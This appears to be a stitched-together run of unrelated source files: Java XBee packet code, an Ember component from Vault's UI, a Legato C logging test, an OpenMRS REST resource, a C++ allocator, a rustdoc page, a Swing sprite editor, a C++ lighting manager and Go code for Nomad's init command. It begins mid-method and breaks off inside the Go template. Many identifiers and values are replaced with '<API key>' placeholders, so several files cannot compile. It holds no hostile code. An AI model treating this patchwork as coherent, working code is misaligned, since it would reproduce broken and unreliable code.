parameters.put("64-bit source address", HexUtils.prettyHexString(sourceAddress64.toString()));
parameters.put("16-bit source address", HexUtils.prettyHexString(sourceAddress16.toString()));
parameters.put("Receive options", HexUtils.prettyHexString(HexUtils.integerToHexString(receiveOptions, 1)));
if (ioSample != null) {
parameters.put("Number of samples", HexUtils.prettyHexString(HexUtils.integerToHexString(1, 1))); // There is always 1 sample.
parameters.put("Digital channel mask", HexUtils.prettyHexString(HexUtils.integerToHexString(ioSample.getDigitalMask(), 2)));
parameters.put("Analog channel mask", HexUtils.prettyHexString(HexUtils.integerToHexString(ioSample.getAnalogMask(), 1)));
for (int i = 0; i < 16; i++) {
if (ioSample.hasDigitalValue(IOLine.getDIO(i)))
parameters.put(IOLine.getDIO(i).getName() + " digital value", ioSample.getDigitalValue(IOLine.getDIO(i)).getName());
}
for (int i = 0; i < 6; i++) {
if (ioSample.hasAnalogValue(IOLine.getDIO(i)))
parameters.put(IOLine.getDIO(i).getName() + " analog value", HexUtils.prettyHexString(HexUtils.integerToHexString(ioSample.getAnalogValue(IOLine.getDIO(i)), 2)));
}
if (ioSample.hasPowerSupplyValue())
try {
parameters.put("Power supply value", HexUtils.prettyHexString(HexUtils.integerToHexString(ioSample.getPowerSupplyValue(), 2)));
} catch (<API key> e) { }
} else if (rfData != null)
parameters.put("RF data", HexUtils.prettyHexString(HexUtils.<API key>(rfData)));
return parameters;
}
} |
import { inject as service } from '@ember/service';
import { or } from '@ember/object/computed';
import { isBlank } from '@ember/utils';
import { task, waitForEvent } from 'ember-concurrency';
import Component from '@ember/component';
import { set } from '@ember/object';
import FocusOnInsertMixin from 'vault/mixins/focus-on-insert';
import keys from 'vault/lib/keycodes';
const LIST_ROOT_ROUTE = 'vault.cluster.secrets.backend.list-root';
const SHOW_ROUTE = 'vault.cluster.secrets.backend.show';
// Form component for creating/showing a secret-backend record. Wires the
// model's persistence lifecycle to route transitions, the setup wizard, and
// keyboard/editor events.
export default Component.extend(FocusOnInsertMixin, {
  router: service(),
  wizard: service(),

  // Current form mode (e.g. 'create' or 'show'); drives wizard transitions
  // and the escape-key handler below.
  mode: null,
  // Seed value for an empty JSON editor.
  emptyData: '{\n}',
  // Overridable no-op hooks a caller may pass in.
  onDataChange() {},
  onRefresh() {},
  model: null,

  // True while any request involving the model is outstanding.
  requestInFlight: or('model.isLoading', 'model.isReloading', 'model.isSaving'),

  didReceiveAttrs() {
    this._super(...arguments);
    // Advance the onboarding wizard when this form matches its current step.
    if (
      (this.wizard.featureState === 'details' && this.mode === 'create') ||
      (this.wizard.featureState === 'role' && this.mode === 'show')
    ) {
      this.wizard.<API key>(this.wizard.featureState, 'CONTINUE', this.backendType);
    }
    if (this.wizard.featureState === 'displayRole') {
      this.wizard.<API key>(this.wizard.featureState, 'NOOP', this.backendType);
    }
  },

  willDestroyElement() {
    this._super(...arguments);
    // Roll back unsaved attributes on errored models so stale edits don't
    // leak into the next time this record is rendered.
    if (this.model && this.model.isError) {
      this.model.rollbackAttributes();
    }
  },

  // Background loop forwarding every body keyup to onEscape; starts when the
  // component is inserted and is cancelled automatically on teardown.
  waitForKeyUp: task(function* () {
    while (true) {
      let event = yield waitForEvent(document.body, 'keyup');
      this.onEscape(event);
    }
  })
    .on('didInsertElement')
    .cancelOn('willDestroyElement'),

  transitionToRoute() {
    this.router.transitionTo(...arguments);
  },

  // ESC in 'show' mode returns to the backend list; ignored otherwise.
  onEscape(e) {
    if (e.keyCode !== keys.ESC || this.mode !== 'show') {
      return;
    }
    this.transitionToRoute(LIST_ROOT_ROUTE);
  },

  // Report the model's dirty state to the caller-supplied hook.
  hasDataChanges() {
    this.onDataChange(this.model.hasDirtyAttributes);
  },

  // Run a persistence method ('save' / 'destroyRecord') on the model and
  // invoke successCallback only if it finished without error.
  persist(method, successCallback) {
    const model = this.model;
    return model[method]().then(() => {
      if (!model.isError) {
        if (this.wizard.featureState === 'role') {
          this.wizard.<API key>('role', 'CONTINUE', this.backendType);
        }
        successCallback(model);
      }
    });
  },

  actions: {
    createOrUpdate(type, event) {
      event.preventDefault();
      // NOTE(review): id is captured before save, so this assumes the id is
      // client-assigned (required below for 'create') — confirm for 'update'.
      const modelId = this.model.id;
      // prevent from submitting if there's no key
      // maybe do something fancier later
      if (type === 'create' && isBlank(modelId)) {
        return;
      }
      this.persist('save', () => {
        this.hasDataChanges();
        this.transitionToRoute(SHOW_ROUTE, modelId);
      });
    },

    // Generic checkbox binding: writes the checked state onto the model.
    setValue(key, event) {
      set(this.model, key, event.target.checked);
    },

    refresh() {
      this.onRefresh();
    },

    delete() {
      this.persist('destroyRecord', () => {
        this.hasDataChanges();
        this.transitionToRoute(LIST_ROOT_ROUTE);
      });
    },

    // Push editor JSON into the model only when the document lints clean.
    codemirrorUpdated(attr, val, codemirror) {
      codemirror.performLint();
      const hasErrors = codemirror.state.lint.marked.length > 0;
      if (!hasErrors) {
        set(this.model, attr, JSON.parse(val));
      }
    },
  },
});
# ADHydro Channel Output Viewer
*<API key>*
**This app is created to run in the Teyths programming environment.**
#include "legato.h"
/* Log-level exercise component: steps the log filter through every level and
 * emits one message at each severity per step, then restores the original
 * filter and exits.  Each macro logs its own level constant as the payload so
 * the output identifies which severities passed the filter. */
COMPONENT_INIT
{
    le_log_Level_t i;
    /* Remember the current filter so it can be restored afterwards. */
    le_log_Level_t origLevel = <API key>();

    /* Presumably messages below the active filter level are suppressed --
     * verify against the le_log documentation. */
    for(i = LE_LOG_DEBUG; i <= LE_LOG_EMERG; i++)
    {
        <API key>(i);
        LE_DEBUG("frame %d msg", LE_LOG_DEBUG);
        LE_INFO("frame %d msg", LE_LOG_INFO);
        LE_WARN("frame %d msg", LE_LOG_WARN);
        LE_ERROR("frame %d msg", LE_LOG_ERR);
        LE_CRIT("frame %d msg", LE_LOG_CRIT);
        LE_EMERG("frame %d msg", LE_LOG_EMERG);
    }

    // Restore original filter level -- required for RTOS where
    // all apps share a single filter level.
    <API key>(origLevel);

    le_thread_Exit(0);
}
package org.openmrs.module.webservices.rest.web.v1_0.resource.openmrs1_8;
import java.util.ArrayList;
import java.util.List;
import org.openmrs.Form;
import org.openmrs.FormField;
import org.openmrs.api.context.Context;
import org.openmrs.module.webservices.rest.web.RequestContext;
import org.openmrs.module.webservices.rest.web.RestConstants;
import org.openmrs.module.webservices.rest.web.annotation.PropertyGetter;
import org.openmrs.module.webservices.rest.web.annotation.Resource;
import org.openmrs.module.webservices.rest.web.annotation.SubResource;
import org.openmrs.module.webservices.rest.web.representation.<API key>;
import org.openmrs.module.webservices.rest.web.representation.FullRepresentation;
import org.openmrs.module.webservices.rest.web.representation.Representation;
import org.openmrs.module.webservices.rest.web.resource.impl.<API key>;
import org.openmrs.module.webservices.rest.web.resource.impl.<API key>;
import org.openmrs.module.webservices.rest.web.resource.impl.NeedsPaging;
import org.openmrs.module.webservices.rest.web.response.ResponseException;
/**
 * {@link Resource} for {@link FormField}, supporting standard CRUD operations.
 * Exposed as a sub-resource of a {@link Form}: each FormField describes how a
 * field is placed on its parent form (position, occurrence limits, ordering).
 */
@SubResource(parent = FormResource1_8.class, path = "formfield", supportedClass = FormField.class, <API key> = {
        "1.8.*", "1.9.*", "1.10.*", "1.11.*", "1.12.*", "2.0.*", "2.1.*" })
public class <API key> extends <API key><FormField, Form, FormResource1_8> {

    /**
     * Describes which properties are serialized for each representation.
     * The default representation links related objects by reference; the full
     * representation inlines them and adds audit information.
     *
     * @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#<API key>(org.openmrs.module.webservices.rest.web.representation.Representation)
     */
    @Override
    public <API key> <API key>(Representation rep) {
        if (rep instanceof <API key>) {
            // Default representation: related objects (parent/form/field) as REF links.
            <API key> description = new <API key>();
            description.addProperty("uuid");
            description.addProperty("display");
            description.addProperty("parent", Representation.REF);
            description.addProperty("form", Representation.REF);
            description.addProperty("field", Representation.REF);
            description.addProperty("fieldNumber");
            description.addProperty("fieldPart");
            description.addProperty("pageNumber");
            description.addProperty("minOccurs");
            description.addProperty("maxOccurs");
            description.addProperty("required");
            description.addProperty("sortWeight");
            description.addProperty("retired");
            description.addSelfLink();
            description.addLink("full", ".?v=" + RestConstants.REPRESENTATION_FULL);
            return description;
        } else if (rep instanceof FullRepresentation) {
            // Full representation: related objects inlined, plus audit info.
            <API key> description = new <API key>();
            description.addProperty("uuid");
            description.addProperty("display");
            description.addProperty("parent");
            description.addProperty("form");
            description.addProperty("field");
            description.addProperty("fieldNumber");
            description.addProperty("fieldPart");
            description.addProperty("pageNumber");
            description.addProperty("minOccurs");
            description.addProperty("maxOccurs");
            description.addProperty("required");
            description.addProperty("sortWeight");
            description.addProperty("retired");
            description.addProperty("auditInfo");
            description.addSelfLink();
            return description;
        }
        // Unsupported representation: let the framework handle it.
        return null;
    }

    /**
     * Properties accepted when creating a new form field via POST.
     * form, field and required are mandatory; the rest are optional.
     *
     * @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#<API key>()
     */
    @Override
    public <API key> <API key>() {
        <API key> description = new <API key>();
        description.addRequiredProperty("form");
        description.addRequiredProperty("field");
        description.addRequiredProperty("required");
        description.addProperty("parent");
        description.addProperty("fieldNumber");
        description.addProperty("fieldPart");
        description.addProperty("pageNumber");
        description.addProperty("minOccurs");
        description.addProperty("maxOccurs");
        description.addProperty("sortWeight");
        return description;
    }

    /**
     * Gets the display string: the form field's name.
     *
     * @param formField the formField name object
     * @return the display string
     */
    @PropertyGetter("display")
    public String getDisplayString(FormField formField) {
        return formField.getName();
    }

    /**
     * Looks a form field up by its UUID.
     *
     * @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#getByUniqueId(java.lang.String)
     */
    @Override
    public FormField getByUniqueId(String uniqueId) {
        return Context.getFormService().getFormFieldByUuid(uniqueId);
    }

    /**
     * Creates an empty delegate to be populated from the request payload.
     *
     * @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#newDelegate()
     */
    @Override
    public FormField newDelegate() {
        return new FormField();
    }

    /**
     * Persists the delegate through the FormService.
     *
     * @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#save(java.lang.Object)
     */
    @Override
    public FormField save(FormField delegate) {
        return Context.getFormService().saveFormField(delegate);
    }

    /**
     * Permanently removes the form field from the database.
     *
     * @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#purge(java.lang.Object,
     *      org.openmrs.module.webservices.rest.web.RequestContext)
     */
    @Override
    public void purge(FormField delegate, RequestContext context) throws ResponseException {
        // Nothing to purge if the delegate was not found.
        if (delegate == null)
            return;
        Context.getFormService().purgeFormField(delegate);
    }

    /**
     * @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#getParent(java.lang.Object)
     */
    @Override
    public Form getParent(FormField instance) {
        return instance.getForm();
    }

    /**
     * @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#setParent(java.lang.Object,
     *      java.lang.Object)
     */
    @Override
    public void setParent(FormField instance, Form parent) {
        instance.setForm(parent);
    }

    /**
     * Lists all non-retired form fields of the parent form.
     *
     * @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#doGetAll(java.lang.Object,
     *      org.openmrs.module.webservices.rest.web.RequestContext)
     */
    @Override
    public NeedsPaging<FormField> doGetAll(Form parent, RequestContext context) throws ResponseException {
        List<FormField> formFields = new ArrayList<FormField>();
        for (FormField formField : parent.getFormFields()) {
            // Retired mappings are excluded from the listing.
            if (!formField.isRetired()) {
                formFields.add(formField);
            }
        }
        return new NeedsPaging<FormField>(formFields, context);
    }

    /**
     * Soft-deletes (retires) the form field rather than purging it.
     * NOTE(review): dateRetired is not set here; presumably the save routine
     * fills in the retirement metadata -- verify against the FormService.
     *
     * @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#delete(java.lang.Object,
     *      java.lang.String, org.openmrs.module.webservices.rest.web.RequestContext)
     */
    @Override
    protected void delete(FormField delegate, String reason, RequestContext context) throws ResponseException {
        delegate.setRetired(true);
        delegate.setRetireReason(reason);
        delegate.setRetiredBy(Context.<API key>());
        Context.getFormService().saveFormField(delegate);
    }
}
#ifndef MALLOCALLOCATER_H_
#define MALLOCALLOCATER_H_

// FIX: this header used names from these headers without including them,
// relying on transitive includes from its consumers.
#include <cstddef>   // std::ptrdiff_t, size_t
#include <cstdlib>   // std::malloc, std::free, std::realloc
#include <limits>    // std::numeric_limits
#include <new>       // std::bad_alloc, placement new

namespace NSHARE
{

/**
 * A minimal STL-compatible allocator backed by malloc/free.
 *
 * Sizes passed to allocate()/reallocate() are element counts (the standard
 * allocator convention), not byte counts. deallocate() ignores its size
 * argument, as free() does not need it.
 */
template<class T>
struct malloc_allocater
{
    typedef size_t size_type;
    typedef std::ptrdiff_t difference_type;
    typedef T* pointer;
    typedef const T* const_pointer;
    typedef T& reference;
    typedef const T& const_reference;
    typedef T value_type;

    // Standard rebind mechanism so containers can allocate their nodes.
    template<class U> struct rebind
    {
        typedef malloc_allocater<U> other;
    };

    malloc_allocater() throw ()
    {
    }
    malloc_allocater(const malloc_allocater&) throw ()
    {
    }
    template<class U> malloc_allocater(const malloc_allocater<U>&) throw ()
    {
    }
    ~malloc_allocater() throw ()
    {
    }

    pointer address(reference x) const
    {
        return &x;
    }
    const_pointer address(const_reference x) const
    {
        return &x;
    }

    /**
     * Allocates raw storage for @a s objects of type T.
     * Returns NULL for a zero-size request; throws std::bad_alloc on failure.
     */
    pointer allocate(size_type s, void const * = NULL)
    {
        using namespace std;
        if (0 == s)
            return NULL;
        pointer temp = (pointer) malloc(s * sizeof(T));
        if (temp == NULL)
            throw std::bad_alloc();
        return temp;
    }

    /** Releases storage previously obtained from allocate()/reallocate(). */
    void deallocate(pointer p, size_type)
    {
        using namespace std;
        free(p);
    }

    /**
     * Resizes the block at @a p to hold @a _new_size objects of type T.
     *
     * BUG FIX: the previous version passed the element count straight to
     * realloc() as a byte count, so any T larger than one byte got an
     * undersized buffer. Scale by sizeof(T), matching allocate(), and throw
     * std::bad_alloc on failure instead of silently returning NULL.
     */
    pointer reallocate(pointer p, size_type _new_size)
    {
        pointer temp = (pointer) std::realloc(p, _new_size * sizeof(T));
        if (temp == NULL && _new_size != 0)
            throw std::bad_alloc();
        return temp;
    }

    /** Largest element count a single allocation could theoretically hold. */
    size_type max_size() const throw ()
    {
        return std::numeric_limits<size_t>::max() / sizeof(T);
    }

    /** Copy-constructs a T in the raw storage at @a p (placement new). */
    void construct(pointer p, const T& val)
    {
        new ((void *) p) T(val);
    }

    /** Destroys the T at @a p without releasing its storage. */
    void destroy(pointer p)
    {
        p->~T();
    }
};

} /* namespace NSHARE */
#endif /* MALLOCALLOCATER_H_ */
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `XK_Hcircumflex` constant in crate `x11_dl`.">
<meta name="keywords" content="rust, rustlang, rust-lang, XK_Hcircumflex">
<title>x11_dl::keysym::XK_Hcircumflex - Rust</title>
<link rel="stylesheet" type="text/css" href="../../rustdoc.css">
<link rel="stylesheet" type="text/css" href="../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]-->
<nav class="sidebar">
<p class='location'><a href='../index.html'>x11_dl</a>::<wbr><a href='index.html'>keysym</a></p><script>window.sidebarCurrent = {name: 'XK_Hcircumflex', ty: 'constant', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</nav>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content constant">
<h1 class='fqn'><span class='in-band'><a href='../index.html'>x11_dl</a>::<wbr><a href='index.html'>keysym</a>::<wbr><a class='constant' href=''>XK_Hcircumflex</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-856' class='srclink' href='../../src/x11_dl/keysym.rs.html#427' title='goto source code'>[src]</a></span></h1>
<pre class='rust const'>pub const XK_Hcircumflex: <a class='type' href='../../std/os/raw/type.c_uint.html' title='std::os::raw::c_uint'>c_uint</a><code> = </code><code>678</code></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<aside id="help" class="hidden">
<div>
<h1 class="hidden">Help</h1>
<div class="shortcuts">
<h2>Keyboard Shortcuts</h2>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
<dt>+</dt>
<dd>Collapse/expand all sections</dd>
</dl>
</div>
<div class="infos">
<h2>Search Tricks</h2>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code> or <code>* -> vec</code>)
</p>
</div>
</div>
</aside>
<script>
window.rootPath = "../../";
window.currentCrate = "x11_dl";
window.playgroundUrl = "";
</script>
<script src="../../jquery.js"></script>
<script src="../../main.js"></script>
<script defer src="../../search-index.js"></script>
</body>
</html> |
package com.snap2d.editor;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.awt.event.WindowAdapter;
import java.awt.event.WindowEvent;
import javax.swing.JFrame;
import javax.swing.JMenu;
import javax.swing.JMenuBar;
import javax.swing.JMenuItem;
import javax.swing.JOptionPane;
import javax.swing.JScrollPane;
import javax.swing.UIManager;
import javax.swing.WindowConstants;
/**
* @author Brian Groenke
*
*/
/**
 * Main window of the sprite editor: an {@link EditPanel} canvas inside a
 * scroll pane, with a File menu offering Open/Save/Exit. Closing the window
 * is routed through {@link #exit()} so unsaved changes can be confirmed.
 */
public class SpriteEditor extends JFrame {

    private static final long serialVersionUID = -<API key>;

    // Initial width and height of the editor window, in pixels.
    public static final int DEFAULT_SIZE = 750;
    public static final String TITLE = "Snapdragon2D Sprite Editor";

    // Singleton-style reference created by main().
    private static SpriteEditor editor;

    // Alias for `this`, used as the parent of modal dialogs.
    JFrame frame = this;
    EditPanel canvas;
    JScrollPane scroller;
    JMenuBar menuBar = new JMenuBar();
    JMenu file = new JMenu("File");
    JMenuItem open, save, exit;

    /**
     * Builds the window: canvas, scroll pane, menu bar, and a window listener
     * that intercepts the close button so exit() can confirm unsaved changes.
     */
    public SpriteEditor() {
        canvas = new EditPanel(this);
        scroller = new JScrollPane(canvas);
        add(scroller);
        this.setSize(DEFAULT_SIZE, DEFAULT_SIZE);
        // Center the window on screen.
        this.<API key>(null);
        this.setTitle(TITLE);
        // DO_NOTHING_ON_CLOSE: closing is handled by the window listener below
        // so we can prompt before discarding unsaved work.
        this.<API key>(WindowConstants.DO_NOTHING_ON_CLOSE);
        this.addWindowListener(new WindowAdapter() {

            @Override
            public void windowClosing(final WindowEvent evt) {
                exit();
            }
        });
        menuBar.add(file);
        open = new JMenuItem("Open");
        open.addActionListener(new ActionListener() {

            @Override
            public void actionPerformed(final ActionEvent e) {
                canvas.load();
            }
        });
        file.add(open);
        save = new JMenuItem("Save");
        save.addActionListener(new ActionListener() {

            @Override
            public void actionPerformed(final ActionEvent e) {
                canvas.save();
            }
        });
        file.add(save);
        exit = new JMenuItem("Exit");
        exit.addActionListener(new ActionListener() {

            @Override
            public void actionPerformed(final ActionEvent e) {
                exit();
            }
        });
        file.add(exit);
        this.setJMenuBar(menuBar);
    }

    /** Revalidates and repaints the scroll pane after the canvas changes size. */
    public void updateScrollPane() {
        scroller.revalidate();
        scroller.repaint();
    }

    /**
     * Exits the application. If the canvas has unsaved changes, asks the user:
     * YES exits without saving, NO saves first (and aborts the exit if the
     * save fails), anything else (cancel/closed dialog) does nothing.
     */
    private final void exit() {
        int resp = JOptionPane.YES_OPTION;
        if (canvas.fileStatus == EditPanel.CHANGED) {
            resp = JOptionPane.showConfirmDialog(frame,
                    "Exit without saving?",
                    "Confirm Exit",
                    JOptionPane.<API key>);
            switch (resp) {
                case JOptionPane.NO_OPTION:
                    boolean chk = canvas.save();
                    if ( !chk) {
                        // Save failed or was cancelled: stay in the editor.
                        return;
                    }
                    // Deliberate fall-through: after a successful save, exit.
                case JOptionPane.YES_OPTION:
                    frame.dispose();
                    System.exit(0);
                    break;
                default:
                    // CANCEL or dialog closed: do nothing.
            }
        } else {
            // No unsaved changes: exit immediately.
            System.exit(0);
        }
    }

    /**
     * Entry point: applies the system look-and-feel (best effort) and shows
     * the editor window.
     *
     * @param args unused
     */
    public static void main(final String[] args) {
        try {
            UIManager.setLookAndFeel(UIManager.<API key>());
        } catch (Exception e) {
            // Non-fatal: fall back to the default look-and-feel.
            e.printStackTrace();
        }
        editor = new SpriteEditor();
        editor.setVisible(true);
    }
}
#include "LightingManager.h"
#include "Color.h"
#include "LightComponent.h"
#include "LightFilter.h"
#include "LightSource.h"
#include "LightStatus.h"
#include "Logs.h"
#include "SurfaceMaterial.h"
#include <algorithm>
#include <cmath>
// Both specular highlights and light filtering are enabled by default.
LightingManager::LightingManager() : specularity(true), filtering(true) {
}
// Number of registered static (always-on) lights.
int LightingManager::<API key>() const {
    return static_lights.size();
}

// Number of registered dynamic light sources.
int LightingManager::getSourcesCount() const {
    return sources.size();
}

// Number of registered light filters.
int LightingManager::getFiltersCount() const {
    return filters.size();
}

// Removes all static lights.
void LightingManager::clearStaticLights() {
    static_lights.clear();
}

// Adds a static light; it is copied into the manager.
void LightingManager::addStaticLight(const LightComponent &light) {
    static_lights.push_back(light);
}

// Drops all source registrations (the sources themselves are not owned).
void LightingManager::clearSources() {
    sources.clear();
}

// Registers a light source; duplicates are ignored.
void LightingManager::registerSource(LightSource *source) {
    if (find(sources.begin(), sources.end(), source) == sources.end()) {
        sources.push_back(source);
    }
}

// Unregisters a light source if present; the pointer is not freed.
void LightingManager::unregisterSource(LightSource *source) {
    if (find(sources.begin(), sources.end(), source) != sources.end()) {
        sources.erase(find(sources.begin(), sources.end(), source));
    }
}

// Drops all filter registrations (the filters themselves are not owned).
void LightingManager::clearFilters() {
    filters.clear();
}

// Registers a light filter; duplicates are ignored.
void LightingManager::registerFilter(LightFilter *filter) {
    if (find(filters.begin(), filters.end(), filter) == filters.end()) {
        filters.push_back(filter);
    }
}

// Unregisters a light filter if present; the pointer is not freed.
void LightingManager::unregisterFilter(LightFilter *filter) {
    if (find(filters.begin(), filters.end(), filter) != filters.end()) {
        filters.erase(find(filters.begin(), filters.end(), filter));
    }
}
// Runs the registered filters over a light component and reports whether the
// light still matters at the given location. A single filter veto discards
// the light; with specularity disabled its reflective part is zeroed.
bool LightingManager::alterLight(LightComponent &component, const Vector3 &location) {
    if (filtering && component.altered) {
        for (auto it = filters.begin(); it != filters.end(); ++it) {
            if (!(*it)->applyLightFilter(component, location)) {
                return false;
            }
        }
    }
    if (!specularity) {
        component.reflection = 0.0;
    }
    // Keep only lights that still carry meaningful energy.
    return component.color.getPower() > 0.0001;
}
// Enables or disables specular highlights globally.
void LightingManager::setSpecularity(bool enabled) {
    specularity = enabled;
}

// Enables or disables the light-filter pass globally.
void LightingManager::setFiltering(bool enabled) {
    filtering = enabled;
}
/**
 * Shades one light component at a surface point: a hardness-shaped diffuse
 * term plus an optional Phong-style specular term.
 *
 * @param component the light reaching the point
 * @param eye       camera position
 * @param location  surface point being shaded
 * @param normal    surface normal at the point (normalized internally)
 * @param material  surface material properties
 * @return the color contribution of this light
 */
Color LightingManager::applyFinalComponent(const LightComponent &component, const Vector3 &eye, const Vector3 &location,
                                           const Vector3 &normal, const SurfaceMaterial &material) {
    Color result, light_color;
    Vector3 direction_inv;
    light_color = component.color;
    // Direction from the surface toward the light.
    direction_inv = component.direction.normalize().scale(-1.0);
    // BUG FIX: the old code called normal.normalize() and discarded the
    // result ('normal' is a const reference, so normalize() returns a new
    // vector), leaving an un-normalized normal in the math below. Use the
    // normalized copy explicitly everywhere.
    Vector3 n = normal.normalize();
    result = COLOR_BLACK;
    /* diffused light */
    double diffuse = direction_inv.dotProduct(n);
    double sign = (diffuse < 0.0) ? -1.0 : 1.0;
    // Material hardness reshapes the diffuse falloff: below 0.5 it blends
    // toward a squared (softer) curve, above 0.5 toward a sqrt (harder) one.
    if (material.hardness <= 0.5) {
        double hardness = material.hardness * 2.0;
        diffuse = (1.0 - hardness) * (diffuse * diffuse) * sign + hardness * diffuse;
    } else if (diffuse != 0.0) {
        double hardness = (material.hardness - 0.5) * 2.0;
        diffuse = (1.0 - hardness) * diffuse + hardness * sign * sqrt(fabs(diffuse));
    }
    // Ambient floor: lifts the diffuse term toward a minimum brightness.
    if (material.ambient > 0.0) {
        diffuse = material.ambient + (1.0 - material.ambient) * diffuse;
    }
    if (diffuse > 0.0) {
        result.r += diffuse * material.base->r * light_color.r;
        result.g += diffuse * material.base->g * light_color.g;
        result.b += diffuse * material.base->b * light_color.b;
    }
    /* specular reflection (only for front-facing light on shiny materials) */
    if (specularity && sign > 0.0 && material.shininess > 0.0 && material.reflection > 0.0 &&
        component.reflection > 0.0) {
        Vector3 view = location.sub(eye).normalize();
        Vector3 reflect = direction_inv.sub(n.scale(2.0 * direction_inv.dotProduct(n)));
        double specular = reflect.dotProduct(view);
        if (specular > 0.0) {
            specular = pow(specular, material.shininess) * material.reflection * component.reflection;
            if (specular > 0.0) {
                result.r += specular * light_color.r;
                result.g += specular * light_color.g;
                result.b += specular * light_color.b;
            }
        }
    }
    /* specular reflection with fresnel effect */
    /*if (material->reflection > 0.0 && light->reflection > 0.0)
    {
        Vector3 view = v3Normalize(v3Sub(location, eye));
        Vector3 h = v3Normalize(v3Sub(direction_inv, view));
        double fresnel = 0.02 + 0.98 * pow(1.0 - v3Dot(v3Scale(view, -1.0), h), 5.0);
        double refl = v3Dot(h, normal);
        if (refl > 0.0)
        {
            double waterBrdf = fresnel * pow(refl, material->shininess);
            if (waterBrdf > 0.0)
            {
                refl = material->reflection * waterBrdf * light->reflection;
                result.r += refl * light_color.r;
                result.g += refl * light_color.g;
                result.b += refl * light_color.b;
            }
        }
    }*/
    return result;
}
// Collects every light affecting the given location into the status object:
// all static lights plus whatever each dynamic source emits there.
void LightingManager::fillStatus(LightStatus &status, const Vector3 &location) const {
    // Static lights apply everywhere.
    for (auto it = static_lights.begin(); it != static_lights.end(); ++it) {
        status.pushComponent(*it);
    }
    // Dynamic sources contribute only if they report lights at this point.
    for (auto it = sources.begin(); it != sources.end(); ++it) {
        vector<LightComponent> components;
        if ((*it)->getLightsAt(components, location)) {
            for (auto cit = components.begin(); cit != components.end(); ++cit) {
                status.pushComponent(*cit);
            }
        }
    }
}
// Full lighting computation for one surface point: gather every component
// reaching it, then let the status object run the shading.
Color LightingManager::apply(const Vector3 &eye, const Vector3 &location, const Vector3 &normal,
                             const SurfaceMaterial &material) {
    LightStatus light_status(this, location, eye);
    fillStatus(light_status, location);
    return light_status.apply(normal, material);
}
package command
import (
"fmt"
"io/ioutil"
"os"
"strings"
)
const (
// DefaultInitName is the default name we use when
// initializing the example file
DefaultInitName = "example.nomad"
)
// InitCommand generates a new job template that you can customize to your
// liking, like vagrant init
type InitCommand struct {
Meta
}
// Help returns the long-form usage text for "nomad init", trimmed of the
// surrounding whitespace the raw literal carries.
func (c *InitCommand) Help() string {
	return strings.TrimSpace(`
Usage: nomad init

  Creates an example job file that can be used as a starting
  point to customize further.
`)
}
// Synopsis returns the one-line description shown in the command list.
func (c *InitCommand) Synopsis() string {
	return "Create an example job file"
}
// Run writes the example job file into the current directory. It refuses to
// overwrite an existing file and takes no arguments. Returns 0 on success,
// 1 on any error (which is reported through the UI).
func (c *InitCommand) Run(args []string) int {
	// "nomad init" accepts no arguments; anything else is misuse.
	if len(args) != 0 {
		c.Ui.Error(c.Help())
		return 1
	}

	// Refuse to clobber an existing example file. A nil stat error means the
	// file exists (os.IsNotExist(nil) is false), which is also a refusal.
	_, err := os.Stat(DefaultInitName)
	switch {
	case err != nil && !os.IsNotExist(err):
		c.Ui.Error(fmt.Sprintf("Failed to stat '%s': %v", DefaultInitName, err))
		return 1
	case !os.IsNotExist(err):
		c.Ui.Error(fmt.Sprintf("Job '%s' already exists", DefaultInitName))
		return 1
	}

	// Write out the example job template.
	if werr := ioutil.WriteFile(DefaultInitName, []byte(defaultJob), 0660); werr != nil {
		c.Ui.Error(fmt.Sprintf("Failed to write '%s': %v", DefaultInitName, werr))
		return 1
	}

	c.Ui.Output(fmt.Sprintf("Example job file written to %s", DefaultInitName))
	return 0
}
// defaultJob is the annotated example job specification written out by
// "nomad init". The string content is written verbatim to example.nomad,
// so every comment inside the literal ships to the user.
var defaultJob = strings.TrimSpace(`
# There can only be a single job definition per file.
# Create a job with ID and Name 'example'
job "example" {
	# Run the job in the global region, which is the default.
	# region = "global"

	# Specify the datacenters within the region this job can run in.
	datacenters = ["dc1"]

	# Service type jobs optimize for long-lived services. This is
	# the default but we can change to batch for short-lived tasks.
	# type = "service"

	# Priority controls our access to resources and scheduling priority.
	# This can be 1 to 100, inclusively, and defaults to 50.
	# priority = 50

	# Restrict our job to only linux. We can specify multiple
	# constraints as needed.
	constraint {
		attribute = "${attr.kernel.name}"
		value = "linux"
	}

	# Configure the job to do rolling updates
	update {
		# Stagger updates every 10 seconds
		stagger = "10s"

		# Update a single task at a time
		max_parallel = 1
	}

	# Create a 'cache' group. Each task in the group will be
	# scheduled onto the same machine.
